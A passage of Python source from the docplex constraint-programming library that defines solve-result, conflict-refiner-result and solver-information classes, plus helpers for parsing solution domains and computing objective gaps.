None by default.\n Returns:\n Value of the process info, default value if not found.\n \"\"\"\n if self.process_infos is None:\n return default\n return self.process_infos.get(name, default)\n\n\n def get_parameters(self):\n \"\"\" Gets the complete dictionary of solving parameters.\n\n Returns:\n Solving parameters, object of class :class:`~docplex.cp.parameters.CpoParameters`.\n \"\"\"\n return self.parameters\n\n\n def get_parameter(self, name, default=None):\n \"\"\" Get a particular solving parameter.\n\n Args:\n name: Name of the parameter to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Parameter value, default value if not found.\n \"\"\"\n if self.parameters is None:\n return default\n return self.parameters.get(name, default)\n\n\n def get_infos(self):\n \"\"\" Gets the complete dictionary of solver information attributes.\n\n Deprecated. use :meth:`get_solver_infos` instead.\n\n Returns:\n Solver information, object of class :class:`CpoSolverInfos`.\n \"\"\"\n return self.solver_infos\n\n\n def get_solver_infos(self):\n \"\"\" Gets the set of information provided by the solver concerning to the solving of the model.\n\n Returns:\n Solver information, object of class :class:`CpoSolverInfos`.\n \"\"\"\n return self.solver_infos\n\n\n def get_info(self, name, default=None):\n \"\"\" Gets a particular solver information attribute.\n\n Deprecated. use :meth:`get_solver_info` instead.\n\n Args:\n name: Name of the information to get\n default: (optional) Default value if not found. None by default.\n Returns:\n Information attribute value, None if not found.\n \"\"\"\n return self.solver_infos.get(name, default)\n\n\n def get_solver_info(self, name, default=None):\n \"\"\" Gets a particular solver information attribute.\n\n Args:\n name: Name of the information to get\n default: (optional) Default value if not found. 
None by default.\n Returns:\n Information attribute value, None if not found.\n \"\"\"\n return self.solver_infos.get(name, default)\n\n\n def _set_json_doc(self, jdoc):\n \"\"\" Set the JSON document used to build this result.\n\n Args:\n jdoc: JSON object\n \"\"\"\n # Add json format version in process infos\n jver = jdoc.get('cpSerializationFormatVersion')\n if jver is not None:\n self.process_infos['JsonFormatVersion'] = jver\n\n # Add parameters\n prms = jdoc.get('parameters', None)\n if prms is not None:\n self.parameters.update(prms)\n\n # Add information attributes\n cpinf = jdoc.get('cpInfo', None)\n if cpinf is not None:\n self.solver_infos.update(cpinf)\n\n\n def _is_json_format_version(self, xver):\n \"\"\" Check whether the source JSON format version is greater or equal to the argument.\n\n Args:\n xver: Expected json format version\n Returns:\n True if json format version is defined and greater or equal to the required value\n \"\"\"\n jver = self.process_infos.get('JsonFormatVersion')\n return (jver is not None) and (jver >= xver)\n\n\n def __str__(self):\n \"\"\" Convert this object into representative string.\n Returns:\n String representing this object\n \"\"\"\n return \"(model: {}, log: {})\".format(self.model.get_name(), \"yes\" if self.solver_log else \"no\")\n\n\nclass CpoSolveResult(CpoRunResult):\n \"\"\" This class represents the result of a call to the solve of a model.\n\n On top of those already stored in :class:`CpoRunResult`, it contains the following elements:\n * solve status,\n * output log\n * solution, if any, object of class :class:`CpoModelSolution`.\n\n If this result contains a solution, the methods implemented in the class :class:`CpoModelSolution`\n to access solution elements are available directly from this class.\n \"\"\"\n def __init__(self, model):\n \"\"\" Constructor:\n\n Args:\n model: Related model\n \"\"\"\n super(CpoSolveResult, self).__init__(model)\n self.solve_status = SOLVE_STATUS_UNKNOWN # Solve status, with value in SOLVE_STATUS_*\n self.fail_status = FAIL_STATUS_UNKNOWN # Fail status, with values in FAIL_STATUS_*\n self.search_status = None # Search status, with value in SEARCH_STATUS_*\n self.stop_cause = None # Stop cause, with values in STOP_CAUSE_*\n self.solveTime = 0 # Solve time\n self.is_a_solution = False # Solution indicator\n self.solution = CpoModelSolution() # Solution\n\n self.process_infos[CpoProcessInfos.MODEL_BUILD_TIME] = model.get_modeling_duration()\n\n\n def _set_solve_status(self, ssts):\n \"\"\" Set the solve status\n\n Args:\n ssts: Solve status\n \"\"\"\n self.solve_status = ssts\n\n\n def get_solve_status(self):\n \"\"\" Gets the solve status.\n\n Returns:\n Solve status, element of the global list :const:`ALL_SOLVE_STATUSES`.\n \"\"\"\n return self.solve_status\n\n\n def get_fail_status(self):\n \"\"\" Gets the solving fail status.\n\n This method is deprecated since release 12.8.\n Use :meth:`~CpoSolveResult.get_search_status` and :meth:`~CpoSolveResult.get_stop_cause` instead.\n\n Returns:\n Fail status, element of the global list :const:`ALL_FAIL_STATUSES`.\n \"\"\"\n return self.fail_status\n\n\n def get_search_status(self):\n \"\"\" Gets the search status.\n\n This solver information is provided by the COS 12.8 CP solver in addition/replacement to solve_status.\n Value is None if the solver is earlier than this version.\n\n Returns:\n Search status, element of the global list :const:`ALL_SEARCH_STATUSES`.\n None if not defined.\n \"\"\"\n return self.search_status\n\n\n def get_stop_cause(self):\n 
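A sketch of how these accessors are typically used on a result object; res stands for the value returned by mdl.solve(), and TimeLimit is a standard CP Optimizer parameter:

```python
res = mdl.solve(TimeLimit=10)               # mdl from the earlier sketch
print(res.get_parameter("TimeLimit"))       # solving parameter actually used
print(res.get_solver_info("SolveTime", 0))  # attribute reported by the engine
res.get_process_infos().write()             # InfoDict exposes write(), per above
```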
\"\"\" Gets the stop cause.\n\n This solver information is provided by the COS 12.8 CP solver in addition/replacement to fail_status.\n Value is None if the solver is earlier than this version.\n\n Returns:\n Stop cause, element of the global list :const:`ALL_STOP_CAUSES`.\n None if not defined.\n \"\"\"\n return self.stop_cause\n\n\n def is_solution(self):\n \"\"\" Checks if this descriptor is a valid solution to the problem.\n\n A solution is present if the solve status is 'Feasible' or 'Optimal'.\n Optimality of the solution should be tested using method :meth:`is_solution_optimal()`.\n\n Returns:\n True if this descriptor is a valid solution to the problem.\n \"\"\"\n return self.is_a_solution\n #return ((self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)) and (self.fail_status != FAIL_STATUS_FAILED_NORMALLY)) \\\n # or ((self.solve_status == SOLVE_STATUS_UNKNOWN) and (self.fail_status == FAIL_STATUS_HAS_NOT_FAILED))\n #return ((self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)) and (self.fail_status != FAIL_STATUS_SEARCH_COMPLETED)) \\\n # or ((self.solve_status == SOLVE_STATUS_UNKNOWN) and (self.fail_status == FAIL_STATUS_HAS_NOT_FAILED))\n\n\n def is_solution_optimal(self):\n \"\"\" Checks if this descriptor contains an optimal solution to the problem.\n\n Returns:\n True if there is a solution that is optimal.\n \"\"\"\n return self.solve_status == SOLVE_STATUS_OPTIMAL\n\n\n def map_solution(self, sobj):\n \"\"\" Map a python object on this solution.\n\n This method builds a copy of the source object and replace in its attributes all occurrences of\n model expressions by their value in this solution.\n This method is called recursively on all child objects.\n\n Args:\n sobj: Source object\n Returns:\n Copy of the source object where model expressions are replaced by their values\n \"\"\"\n return self.solution.map_solution(sobj)\n\n\n def __nonzero__(self):\n \"\"\" Check if this descriptor contains a solution to the problem.\n Equivalent to is_solution()\n\n Returns:\n True if a solution is available (Search status is 'Feasible' or 'Optimal')\n \"\"\"\n return self.is_solution()\n\n\n def __bool__(self):\n \"\"\" Check if this descriptor contains a solution to the problem.\n Equivalent to is_solution()\n\n Equivalent to __nonzero__ for Python 3\n\n Returns:\n True if a solution is available (Search status is 'Feasible' or 'Optimal')\n \"\"\"\n return self.is_solution()\n\n\n def get_solution(self):\n \"\"\" Get the model solution\n\n Returns:\n Model solution, object of class :class:`CpoModelSolution`.\n \"\"\"\n return self.solution\n\n\n def get_objective_values(self):\n \"\"\" Gets the numeric values of all objectives.\n\n Returns:\n Array of all objective values, None if none.\n \"\"\"\n return self.solution.get_objective_values()\n\n\n def get_objective_bounds(self):\n \"\"\" Gets the numeric values of all objectives bound.\n\n Note that when :meth:`~docplex.cp.modeler.minimize_static_lex` or :meth:`~docplex.cp.modeler.maximize_static_lex` is used,\n the bound values must be taken as a whole, as are the values delivered by :meth:`get_objective_values`.\n One cannot interpret bound values on each criterion independently.\n For example, suppose, we have a problem with two criteria specified to minimize_static_lex,\n a number of workers, and a number of days to complete a job.\n That is, we always prefer to use less workers, but for equal numbers of workers, we prefer to take less days.\n Then a solution with 3 workers and 10 days is perfectly 
compatible with a lower bound of 2 workers and 13 days,\n even though the lower bound on the number of days is higher than the value in the solution.\n\n Returns:\n Array of all objective bound values, None if none.\n \"\"\"\n return self.solution.get_objective_bounds()\n\n\n def get_objective_gaps(self):\n \"\"\" Gets the numeric values of the gap between objective value and objective bound.\n\n For a single objective, gap is calculated as gap = \\|value - bound\\| / max(1e-10, \\|value\\|)\n\n For multiple objectives, each gap is the gap between corresponding value and bound.\n However, after the first gap whose value is not within optimality tolerance specified by\n :attr:`~docplex.cp.CpoParameters.OptimalityTolerance` and :attr:`~docplex.cp.CpoParameters.RelativeOptimalityTolerance`,\n all returned gap values are positive infinity.\n\n Returns:\n Array of all objective gap values, None if not defined.\n \"\"\"\n return self.solution.objective_gaps\n\n\n def get_kpis(self):\n \"\"\" Get the solution kpis\n\n Returns:\n Dictionary containing value of the KPIs that have been defined in the model.\n \"\"\"\n return self.solution.get_kpis()\n\n\n def _set_model_attributes(self, nbintvars=0, nbitvvars=0, nbseqvars=0, nbctrs=0):\n \"\"\" Set the general model attributes.\n\n This method is called when solve is done on the cloud, when not all information is available from the solver.\n\n Args:\n nbintvars: Number of integer variables\n nbitvvars: Number of interval variables\n nbseqvars: Number of sequence variables\n nbctrs: Number of constraints\n \"\"\"\n self.solver_infos[CpoSolverInfos.NUMBER_OF_INTEGER_VARIABLES] = nbintvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_INTERVAL_VARIABLES] = nbitvvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_SEQUENCE_VARIABLES] = nbseqvars\n self.solver_infos[CpoSolverInfos.NUMBER_OF_CONSTRAINTS] = nbctrs\n\n\n def _set_solve_time(self, time):\n \"\"\" Set the solve time required for this solution.\n\n Args:\n time (float): Solve time in seconds\n \"\"\"\n self.solveTime = time\n\n\n def get_solve_time(self):\n \"\"\" Gets the solve time required for this solution.\n\n Returns:\n (float) Solve time in seconds.\n \"\"\"\n return self.solveTime\n\n\n def get_var_solution(self, name):\n \"\"\" Gets a variable solution from this model solution.\n\n Args:\n name: Variable name or variable expression.\n Returns:\n Variable solution, object of class :class:`CpoVarSolution`, None if not found.\n \"\"\"\n return self.solution.get_var_solution(name)\n\n\n def get_all_var_solutions(self):\n \"\"\" Gets the list of all variable solutions from this model solution.\n\n Returns:\n List of all variable solutions (class :class:`CpoVarSolution`).\n \"\"\"\n return self.solution.get_all_var_solutions()\n\n\n def get_value(self, name):\n \"\"\" Gets the value of a variable.\n\n For IntVar, value is an integer.\n For IntervalVar, value is a tuple (start, end, size), () if absent.\n For SequenceVar, value is list of interval variable solutions.\n For StateFunction, value is list of steps.\n\n Args:\n name: Variable name, or model variable descriptor.\n Returns:\n Variable value, None if variable is not found.\n \"\"\"\n return self.solution.get_value(name)\n\n\n def _add_json_solution(self, jsol, expr_map):\n \"\"\" Add a json solution to this result descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. 
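The per-type value shapes listed for get_value() are worth seeing side by side (names are the hypothetical ones used earlier):

```python
v = res.get_value("x")    # IntVar         -> an integer, e.g. 7
iv = res.get_value("t")   # IntervalVar    -> (start, end, size), or () if absent
if iv:                    # the empty tuple means the interval is absent
    start, end, size = iv
# SequenceVar   -> list of interval variable solutions, in sequence order
# StateFunction -> list of (start, end, value) steps
```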
Key is name in JSON document, value is corresponding model expression.\n \"\"\"\n # Notify run result about JSON document\n self._set_json_doc(jsol)\n\n # Add solution\n self.solution._add_json_solution(jsol, expr_map, self.model, self.parameters)\n\n # Add solver status\n status = jsol.get('solutionStatus', None)\n if status:\n self.solve_status = status.get('solveStatus', self.solve_status)\n self.fail_status = status.get('failStatus', self.fail_status)\n self.search_status = status.get('SearchStatus')\n self.stop_cause = status.get('SearchStopCause')\n\n nsts = status.get('nextStatus')\n if nsts in ('NextFalse', 'NextTerminated'):\n # Only for end of search_next\n self.fail_status = FAIL_STATUS_SEARCH_COMPLETED\n self.is_a_solution = (self.solve_status == SOLVE_STATUS_OPTIMAL) \\\n and (self.solution.get_objective_values() is not None)\n else:\n rto = jsol.get('responseTo', None)\n if rto == 'Propagate':\n self.is_a_solution = (self.solve_status != SOLVE_STATUS_INFEASIBLE) and (self.search_status == SEARCH_STATUS_COMPLETED)\n else:\n self.is_a_solution = self.solve_status in (SOLVE_STATUS_FEASIBLE, SOLVE_STATUS_OPTIMAL)\n\n\n def __getitem__(self, name):\n \"\"\" Overloading of [] to get a variable solution from this model solution\n\n Args:\n name: Variable name or CPO variable expression\n Returns:\n Variable solution (class CpoVarSolution)\n \"\"\"\n return self.get_value(name)\n\n\n def print_solution(self, out=None):\n \"\"\" Prints the solution on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use write() instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the solve result\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. 
If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n # Print model attributes\n sinfos = self.get_solver_infos()\n out.write(u\"-------------------------------------------------------------------------------\\n\")\n out.write(u\"Model constraints: \" + str(sinfos.get_number_of_constraints()))\n out.write(u\", variables: integer: \" + str(sinfos.get_number_of_integer_vars()))\n out.write(u\", interval: \" + str(sinfos.get_number_of_interval_vars()))\n out.write(u\", sequence: \" + str(sinfos.get_number_of_sequence_vars()))\n out.write(u'\\n')\n\n # Print search/solve status\n s = self.get_search_status()\n if s:\n out.write(u\"Solve status: \" + str(self.get_solve_status()) + \"\\n\")\n out.write(u\"Search status: \" + str(s))\n s = self.get_stop_cause()\n if s:\n out.write(u\", stop cause: \" + str(s))\n out.write(u\"\\n\")\n else:\n # Old fashion\n out.write(u\"Solve status: \" + str(self.get_solve_status()) + \", Fail status: \" + str(self.get_fail_status()) + \"\\n\")\n # Print solve time\n out.write(u\"Solve time: \" + str(round(self.get_solve_time(), 2)) + \" sec\\n\")\n out.write(u\"-------------------------------------------------------------------------------\\n\")\n\n self.solution.write(out)\n\n\n def write_in_string(self):\n \"\"\" Build a string representation of this object.\n\n The string that is returned is the same than what is printed by calling :meth:`write`.\n\n Returns:\n String representation of this object.\n \"\"\"\n out = StringIO()\n self.write(out)\n res = out.getvalue()\n out.close()\n return res\n\n\n def __str__(self):\n \"\"\" Build a short string representation of this object.\n Returns:\n String representation of this object.\n \"\"\"\n res = \"(model: {}, solve: {}, search: {}\".format(self.model.get_name(), self.get_solve_status(), self.get_search_status())\n if self.is_solution():\n res += \", solution: {}\".format(self.get_solution())\n res += \")\"\n return res\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n def __ne__(self, other):\n \"\"\" Overwrite inequality comparison \"\"\"\n return not self.__eq__(other)\n\n\nclass CpoRefineConflictResult(CpoRunResult):\n \"\"\" This class represents the result of a call to the conflict refiner.\n\n A conflict is a subset of the constraints and/or variables of the model which are\n mutually contradictory.\n\n The conflict refiner first examines the full infeasible model to identify portions of the conflict\n that it can remove. 
By this process of refinement, the conflict refiner arrives at a minimal conflict.\n A minimal conflict is usually smaller than the full infeasible model and thus makes infeasibility analysis easier.\n Since the conflict is minimal, removal of any one of these constraints will remove that particular cause\n for infeasibility.\n There may be other conflicts in the model; consequently, repair of a given conflict does not guarantee\n feasibility of the remaining model.\n If a model happens to include multiple independent causes of infeasibility,\n then it may be necessary for the user to repair one such cause and then repeat the diagnosis with further\n conflict analysis.\n \"\"\"\n def __init__(self, model):\n # \"\"\" Creates a new empty conflict refiner result.\n #\n # Args:\n # model: Related model\n # \"\"\"\n super(CpoRefineConflictResult, self).__init__(model)\n self.member_constraints = [] # List of member constraints\n self.possible_constraints = [] # List of possible member constraints\n self.member_variables = [] # List of member variables\n self.possible_variables = [] # List of possible member variables\n self.solver_infos = CpoSolverInfos() # Solving information\n self.cpo_conflict = None # Conflict in CPO format\n\n\n def get_all_member_constraints(self):\n \"\"\" Returns the list of all constraints that are certainly member of the conflict.\n\n Returns:\n List of model constraints (class CpoExpr) certainly member of the conflict.\n \"\"\"\n return self.member_constraints\n\n\n def get_all_possible_constraints(self):\n \"\"\" Returns the list of all constraints that are possibly member of the conflict.\n\n Returns:\n List of model constraints (class CpoExpr) possibly member of the conflict.\n \"\"\"\n return self.possible_constraints\n\n\n def get_all_member_variables(self):\n \"\"\" Returns the list of all variables that are certainly member of the conflict.\n\n Returns:\n List of model variables (class CpoIntVar or CpoIntervalVar) certainly member of the conflict.\n \"\"\"\n return self.member_variables\n\n\n def get_all_possible_variables(self):\n \"\"\" Returns the list of all variables that are possibly member of the conflict.\n\n Returns:\n List of model variables (class CpoIntVar or CpoIntervalVar) possibly member of the conflict.\n \"\"\"\n return self.possible_variables\n\n\n def get_cpo(self):\n \"\"\" Returns the conflict represented in CPO format.\n\n Returns:\n String containing the conflict in CPO format, None if not given.\n \"\"\"\n return self.cpo_conflict\n\n\n def is_conflict(self):\n \"\"\" Checks if this descriptor contains a valid conflict.\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return len(self.member_constraints) != 0 or len(self.possible_constraints) != 0 \\\n or len(self.member_variables) != 0 or len(self.possible_variables) != 0\n\n\n def __nonzero__(self):\n \"\"\" Check if this descriptor contains a conflict.\n Equivalent to is_conflict()\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return self.is_conflict()\n\n\n def __bool__(self):\n \"\"\" Check if this descriptor contains a conflict.\n Equivalent to is_conflict()\n\n Equivalent to __nonzero__ for Python 3\n\n Returns:\n True if there is a conflict, False otherwise.\n \"\"\"\n return self.is_conflict()\n\n\n def _add_json_solution(self, jsol, expr_map):\n \"\"\" Add a json solution to this result descriptor\n\n Args:\n jsol: JSON document representing solution.\n expr_map: Map of model expressions. 
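A sketch of consuming a conflict result; it assumes refine_conflict() is called on an infeasible model (mdl is hypothetical):

```python
cres = mdl.refine_conflict()          # returns a CpoRefineConflictResult
if cres:                              # __bool__ delegates to is_conflict()
    for c in cres.get_all_member_constraints():
        print("in conflict:", c)
    # Repairing one conflict does not guarantee feasibility: repeat the
    # refine/repair cycle until no conflict remains.
else:
    print("model reported no conflict")
```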
Key is name in JSON document, value is corresponding model expression.\n \"\"\"\n # Notify run result about JSON document\n self._set_json_doc(jsol)\n\n # Get conflict data\n conflict = jsol.get('conflict')\n if conflict is None:\n return\n\n # Add constraints\n for name, status in conflict.get('constraints', {}).items():\n expr = _get_expr_from_map(expr_map, name)\n if status == 'ConflictMember':\n self.member_constraints.append(expr)\n else:\n self.possible_constraints.append(expr)\n\n # Add variables\n vars = conflict.get('intVars', {}).copy()\n vars.update(conflict.get('intervalVars', {}))\n for name, status in vars.items():\n expr = _get_expr_from_map(expr_map, name)\n if status == 'ConflictMember':\n self.member_variables.append(expr)\n else:\n self.possible_variables.append(expr)\n\n\n def print_conflict(self, out=None):\n \"\"\" Prints this conflict on a given output.\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n DEPRECATED. Use :meth:`write` instead.\n\n Args:\n out: Target output stream or output file, standard output if not given.\n \"\"\"\n self.write(out)\n\n\n def write(self, out=None):\n \"\"\" Write the conflict\n\n If the given output is a string, it is considered as a file name that is opened by this method\n using 'utf-8' encoding.\n\n Args:\n out (Optional): Target output stream or file name. If not given, default value is sys.stdout.\n \"\"\"\n # Check file\n if is_string(out):\n with open_utf8(os.path.abspath(out), mode='w') as f:\n self.write(f)\n return\n # Check default output\n if out is None:\n out = sys.stdout\n\n out.write(u\"Conflict refiner result:\\n\")\n if not self.is_conflict():\n out.write(u\" No conflict\\n\")\n return\n\n # Print constraints in the conflict\n lc = self.get_all_member_constraints()\n if lc:\n out.write(u\"Member constraints:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(_build_conflict_constraint_string(c)))\n lc = self.get_all_possible_constraints()\n if lc:\n out.write(u\"Possible member constraints:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(_build_conflict_constraint_string(c)))\n\n # Print variables in the conflict\n lc = self.get_all_member_variables()\n if lc:\n out.write(u\"Member variables:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(c))\n lc = self.get_all_possible_variables()\n if lc:\n out.write(u\"Possible member variables:\\n\")\n for c in lc:\n out.write(u\" {}\\n\".format(c))\n\n # Print cpo format if any\n cpo = self.get_cpo()\n if cpo:\n out.write(u\"Conflict in CPO format:\\n\")\n for line in cpo.splitlines():\n out.write(u\" \" + line + \"\\n\")\n\n\n def __str__(self):\n \"\"\" Build a string representation of this object.\n\n The string that is returned is the same than what is printed by calling :meth:`write`.\n\n Returns:\n String representation of this object.\n \"\"\"\n out = StringIO()\n self.write(out)\n res = out.getvalue()\n out.close()\n return res\n\n\n def __eq__(self, other):\n \"\"\" Overwrite equality comparison\n\n Args:\n other: Other object to compare with\n Returns:\n True if this object is equal to the other, False otherwise\n \"\"\"\n return utils.equals(self, other)\n\n\nclass CpoSolverInfos(InfoDict):\n \"\"\" Dictionary of various solver informations.\n\n This class groups various information returned by the solver at the end of the solve.\n It is implemented as an extension of the class :class:`docplex.cp.utils.InfoDict` and takes profit of\n the methods such as 
:meth:`~docplex.cp.utils.InfoDict.write` that allows to easily print\n the full content of the information structure.\n \"\"\"\n\n # Total number of constraints\n NUMBER_OF_CONSTRAINTS = 'NumberOfConstraints'\n\n # Total number of integer variables\n NUMBER_OF_INTEGER_VARIABLES = 'NumberOfIntegerVariables'\n\n # Total number of interval variables\n NUMBER_OF_INTERVAL_VARIABLES = 'NumberOfIntervalVariables'\n\n # Total number of sequence variables\n NUMBER_OF_SEQUENCE_VARIABLES = 'NumberOfSequenceVariables'\n\n # Total solve time\n SOLVE_TIME = 'SolveTime'\n\n def __init__(self):\n super(InfoDict, self).__init__()\n\n def get_number_of_integer_vars(self):\n \"\"\" Gets the number of integer variables in the model.\n\n Returns:\n Number of integer variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_INTEGER_VARIABLES, 0)\n\n\n def get_number_of_interval_vars(self):\n \"\"\" Gets the number of interval variables in the model.\n\n Returns:\n Number of interval variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_INTERVAL_VARIABLES, 0)\n\n\n def get_number_of_sequence_vars(self):\n \"\"\" Gets the number of sequence variables in the model.\n\n Returns:\n Number of sequence variables.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_SEQUENCE_VARIABLES, 0)\n\n\n def get_number_of_constraints(self):\n \"\"\" Gets the number of constraints in the model.\n\n Returns:\n Number of constraints.\n \"\"\"\n return self.get(CpoSolverInfos.NUMBER_OF_CONSTRAINTS, 0)\n\n\n def get_solve_time(self):\n \"\"\" Gets the total solve time.\n\n Returns:\n Total solve time in seconds, -1 if unknown\n \"\"\"\n return self.get(CpoSolverInfos.SOLVE_TIME, -1)\n\n\nclass CpoProcessInfos(InfoDict):\n \"\"\" Dictionary of various process information.\n\n This class groups various information related to the processing of the model by the Python API.\n It is implemented as an extension of the class :class:`~docplex.cp.utils.InfoDict` and takes profit of\n the methods such as :meth:`~docplex.cp.utils.InfoDict.write` that allows to easily print\n the full content of the information structure.\n\n Note that the content is purely informative. 
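Reading model statistics back through the getters just defined, with res from the earlier solve sketch:

```python
infos = res.get_solver_infos()
print("constraints :", infos.get_number_of_constraints())
print("integer vars:", infos.get_number_of_integer_vars())
print("solve time  :", infos.get_solve_time())  # -1 when not reported
```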
Information names and values depends on the implementation\n of the solver agent that has been used to solve the model.\n\n This class provides few methods to access the most important information stored in it.\n All information is available using regular dictionary access expression.\n \"\"\"\n\n # Name of the agent used to solve the model\n SOLVER_AGENT = \"SolverAgent\"\n\n # Model build time (time between model creation and last addition of an expression)\n MODEL_BUILD_TIME = \"ModelBuildTime\"\n\n # Attribute name for time needed to transform model into CPO format\n MODEL_COMPILE_TIME = \"ModelCompileTime\"\n\n # Attribute name for time needed to dump model in file and/or on log\n MODEL_DUMP_TIME = \"ModelDumpTime\"\n\n # Attribute name for time needed to submit the model to solver\n MODEL_SUBMIT_TIME = \"ModelSubmitTime\"\n\n # Attribute name for the size of the generated CPO model\n MODEL_DATA_SIZE = \"ModelDataSize\"\n\n # Attribute name for total solve time (including model send and response receive)\n SOLVE_TOTAL_TIME = \"TotalSolveTime\"\n\n # Attribute name for time needed to retrieve result\n RESULT_RECEIVE_TIME = \"ResultReceiveTime\"\n\n # Attribute name for size of the result string\n RESULT_DATA_SIZE = \"ResultDataSize\"\n\n # Attribute name for total time needed to parse JSON result\n TOTAL_JSON_PARSE_TIME = \"TotalJsonParseTime\"\n\n # Attribute name for size of the log data\n TOTAL_LOG_DATA_SIZE = \"TotalLogDataSize\"\n\n # Attribute name for total time needed to encode strings in UTF8\n TOTAL_UTF8_ENCODE_TIME = \"TotalUtf8EncodeTime\"\n\n # Attribute name for total time needed to decode strings from UTF-8\n TOTAL_UTF8_DECODE_TIME = \"TotalUtf8DecodeTime\"\n\n # Time needed to send model to the solver\n TOTAL_DATA_SEND_TIME = \"TotalDataSendTime\"\n\n # Total size of data sent to solver\n TOTAL_DATA_SEND_SIZE = \"TotalDataSendSize\"\n\n # Total size of data received from solver\n TOTAL_DATA_RECEIVE_SIZE = \"TotalDataReceiveSize\"\n\n\n def __init__(self):\n super(InfoDict, self).__init__()\n\n\n def get_model_build_time(self):\n \"\"\" Get the time spent to build the model.\n\n Modeling time is computed as the time spent between model creation and last addition of a model expression.\n\n Returns:\n Total modeling time in seconds.\n \"\"\"\n return self.get(CpoProcessInfos.MODEL_BUILD_TIME)\n\n\n def get_total_solve_time(self):\n \"\"\" Get the total solve time, including time to send model and retrieve result.\n\n Returns:\n Total solve time in seconds.\n \"\"\"\n return self.get(CpoProcessInfos.SOLVE_TOTAL_TIME)\n\n\n###############################################################################\n## Private functions\n###############################################################################\n\n# Constants conversion\n_NUMERIC_VALUES = {# Numeric value generated by CPO\n 'intmin': INT_MIN, 'intmax': INT_MAX,\n 'intervalmin': INTERVAL_MIN, 'intervalmax': INTERVAL_MAX,\n 'infinity': POSITIVE_INFINITY, '-infinity': NEGATIVE_INFINITY,\n # Numeric values generated by JSON\n 'NaN': float('nan'),\n 'Infinity': POSITIVE_INFINITY, '-Infinity': NEGATIVE_INFINITY}\n\n\n# Marker of interval with holes\n_HOLE_MARKER = \"holes\"\n\ndef _get_domain(val):\n \"\"\" Convert a solution value into domain.\n\n Args:\n val: Value to convert\n Returns:\n Variable domain\n \"\"\"\n if is_array(val):\n res = []\n for v in val:\n if is_array(v):\n vl = len(v)\n if vl == 2:\n res.append((_get_num_value(v[0]), _get_num_value(v[1])))\n elif vl == 3:\n res.append((_get_num_value(v[0]), 
_get_num_value(v[1]), _HOLE_MARKER))\n assert v[2] == _HOLE_MARKER, \"Domain interval with 3 elements must contains '{}' as last one\".format(_HOLE_MARKER)\n else:\n assert False, \"Domain interval should contain only 2 elements\"\n else:\n res.append(_get_num_value(v))\n return tuple(res)\n else:\n return _get_num_value(val)\n\n\ndef _get_interval(val):\n \"\"\" Convert a solution value given in JSON.\n\n Args:\n val: JSON value to convert\n Returns:\n Converted value\n \"\"\"\n if isinstance(val, list):\n lb, ub = val\n return (lb, ub) if lb != ub else _get_num_value(lb)\n return _get_num_value(val)\n\n\ndef _get_num_value(val):\n \"\"\" Convert a solution value into number.\n Interpret intmin, intmax, intervalmin, intervalmax, NaN, Infinity if any.\n\n Args:\n val: Value to convert\n Returns:\n Converted value, itself if not found\n \"\"\"\n return _NUMERIC_VALUES.get(val, val)\n\n\ndef _check_arg_domain(val, name):\n \"\"\" Check that an argument is a correct domain and raise error if wrong\n\n Domain is:\n * a single integer for a fixed domain\n * a list of integers or intervals expressed as tuples.\n\n Args:\n val: Argument value\n name: Argument name\n Returns:\n Domain to be set\n Raises:\n Exception if argument has the wrong format\n \"\"\"\n # Check single integer\n if is_int(val):\n return val\n # Check list of integers or tuples\n assert is_array(val), \"Argument '\" + name + \"' should be a list of integers and/or intervals\"\n for v in val:\n if not is_int(v):\n assert _is_domain_interval(v), \"Argument '\" + name + \"' should be a list of integers and/or intervals (tuples of 2 integers)\"\n return val\n\n\ndef _is_domain_interval(val):\n \"\"\" Check if a value is representing a valid domain interval\n Args:\n val: Value to check\n Returns:\n True if value is a tuple representing an interval\n \"\"\"\n if not isinstance(val, tuple):\n return False\n if not (is_int(val[0]) and is_int(val[1]) and (val[1] >= val[0])):\n return False\n vl = len(val)\n if vl == 2:\n return True\n if vl == 3:\n return val[2] == _HOLE_MARKER\n return False\n\n\ndef _build_conflict_constraint_string(ctr):\n \"\"\" Build the string used to represent a constraint in conflict refiner\n Args:\n ctr: Constraint to print\n Returns:\n Constraint string\n \"\"\"\n return str(ctr)\n\n\ndef _compute_gap(val, bnd):\n \"\"\" Compute the gap of a value\n Args:\n val: Objective value\n bnd: Objective bound\n Returns:\n Objective gap\n \"\"\"\n if val in (POSITIVE_INFINITY, NEGATIVE_INFINITY) or bnd in (POSITIVE_INFINITY, NEGATIVE_INFINITY):\n return POSITIVE_INFINITY\n if not is_number(val) or not is_number(bnd):\n return POSITIVE_INFINITY\n return float(abs(val - bnd)) / max(1e-10, abs(val))\n\n\ndef _is_below_tolerance(val, bnd, rt, at):\n \"\"\" Check if an objective value is in the tolerance with given bound.\n Args:\n val: Value to check\n bnd: Objective bound\n rt: Relative tolerance\n at: Absolute tolerance\n Returns:\n True if value is below the tolerance, false otherwise\n \"\"\"\n if not is_number(val) or not is_number(bnd):\n return False\n 